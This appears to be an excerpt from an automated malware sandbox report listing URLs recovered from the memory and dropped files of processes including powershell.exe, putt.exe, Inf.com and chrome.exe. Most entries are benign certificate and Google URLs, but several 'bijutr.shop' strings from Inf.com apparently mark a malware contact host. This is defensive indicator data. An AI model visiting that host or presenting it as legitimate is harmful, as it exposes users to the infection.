Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B604000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: svchost.exe, 00000016.00000002.3022597422.0000028F60200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B604000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: lem[1].exe.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B604000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: svchost.exe, 00000016.00000003.2541509841.0000028F60058000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.22.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.22.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.22.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000016.00000003.2541509841.0000028F60058000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000016.00000003.2541509841.0000028F60058000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000016.00000003.2541509841.0000028F6008D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.22.dr, edb.log.22.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.22.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000015.00000003.2554251403.00000ED80101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554420147.00000ED800F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554455524.00000ED801038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554157333.00000ED80100C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, putt.exe, 00000005.00000000.1939217246.0000000000409000.00000002.00000001.01000000.0000000B.sdmp, putt.exe, 00000005.00000002.1948140308.0000000000409000.00000002.00000001.01000000.0000000B.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000000.00000002.1966743727.000001D062BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B604000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000000.00000002.1942637880.000001D052D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554251403.00000ED80101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554420147.00000ED800F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554455524.00000ED801038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555559404.00000ED800CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554157333.00000ED80100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555581654.00000ED800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555606327.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555642073.00000ED800F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554388220.00000ED801080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554251403.00000ED80101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554420147.00000ED800F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554455524.00000ED801038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555559404.00000ED800CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554157333.00000ED80100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555581654.00000ED800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555606327.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555642073.00000ED800F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554388220.00000ED801080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554251403.00000ED80101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554420147.00000ED800F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554455524.00000ED801038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555559404.00000ED800CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554157333.00000ED80100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555581654.00000ED800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555606327.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555642073.00000ED800F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554388220.00000ED801080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000015.00000003.2556148842.00000ED80120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555932355.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554251403.00000ED80101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554420147.00000ED800F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554455524.00000ED801038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555559404.00000ED800CB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2556074286.00000ED8010C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554157333.00000ED80100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555581654.00000ED800F34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555606327.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2555642073.00000ED800F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2554388220.00000ED801080000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: powershell.exe, 00000000.00000002.1942637880.000001D052D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1942637880.000001D052B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1942637880.000001D052D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Subtle.14.dr, Inf.com.7.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000000.00000002.1942637880.000001D052D98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Inf.com, 00000012.00000002.3020456536.0000000000975000.00000002.00000001.01000000.0000000D.sdmp, Silicon.14.dr, Inf.com.7.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: powershell.exe, 00000000.00000002.1966743727.000001D062E71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B604000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1941897847.000001D050D1B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1985354132.000001D06B5FC000.00000004.00000020.00020000.00000000.sdmp, putt.exe.0.dr, lem[1].exe.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: chrome.exe, 00000015.00000003.2593082155.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2599700581.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000015.00000003.2555897627.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2551434778.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550191894.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 00000015.00000003.2555897627.00000ED800C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2551434778.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550191894.00000ED800C34000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardnNames)
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000015.00000003.2573874031.00000ED800294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000015.00000003.2583975141.00000ED80280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: powershell.exe, 00000000.00000002.1942637880.000001D052B71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000015.00000003.2549442265.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550314346.00000ED80037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2550353076.00000ED800AFC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: chrome.exe, 00000015.00000003.2595764404.00000ED803044000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595394676.00000ED8030C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2595463775.00000ED8030D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2596235017.00000ED801C14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Inf.com, 00000012.00000002.3021593436.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.s
Source: Inf.com, 00000012.00000002.3019523263.00000000003DD000.00000040.00001000.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3019523263.000000000040C000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop
Source: Inf.com, 00000012.00000002.3021593436.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/
Source: Inf.com, 00000012.00000002.3021593436.0000000001A98000.00000004.00000020.00020000.00000000.sdmp, Inf.com, 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/&
Source: Inf.com, 00000012.00000002.3021593436.0000000001A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/.
Source: Inf.com, 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bijutr.shop/4
